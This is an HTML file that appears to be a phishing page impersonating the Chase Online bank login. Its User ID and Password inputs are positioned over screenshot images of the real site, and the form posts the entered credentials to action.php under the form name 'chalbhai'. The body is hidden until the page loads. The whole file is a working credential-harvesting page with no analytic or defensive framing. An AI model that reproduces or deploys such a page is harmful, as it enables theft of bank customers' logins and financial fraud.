<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Chase Online - Identification</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style> 
 .textbox { 
    -webkit-border-radius: 3px; 
    -moz-border-radius: 3px; 
    border-radius: 3px; 
    border: 1px solid #848484; 
    outline:0; 
    height:35px; 
    width: 275px;
font-size: 18px;	
 } 
</style>

<style type="text/css"> 
body { 
width:100%; 
height:100%; 
} 
</style> 


	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
</head>
<body>


<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:645px; width:1344px; height:610px; z-index:1"><img src="images/footer.png" alt="" title="" border=0 width="100%" height="100%"></div>
<form action=action.php name=chalbhai id=chalbhai method=post>
<input name="formtext1" placeholder="User ID"  autocomplete="off" class="textbox" title="Please Enter Your User ID" autofocus required type="text" style="position:absolute;width:210px;left:866px;top:221px;z-index:2">
<input name="formtext2" placeholder="Password" autocomplete="off" class="textbox" title="Please Enter Your Password" autofocus required type="password" style="position:absolute;width:210px;left:866px;top:259px;z-index:3">
<div id="formimage1" style="position:absolute; left:864px; top:326px; z-index:4"><input type="image" name="formimage1" width="220" height="37" src="images/loguin.png"></div>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1340px; height:639px; z-index:0"><img src="images/login.png" alt="" title="" border=0 width="100%" height="100%"></div></form>
</body>
</html>
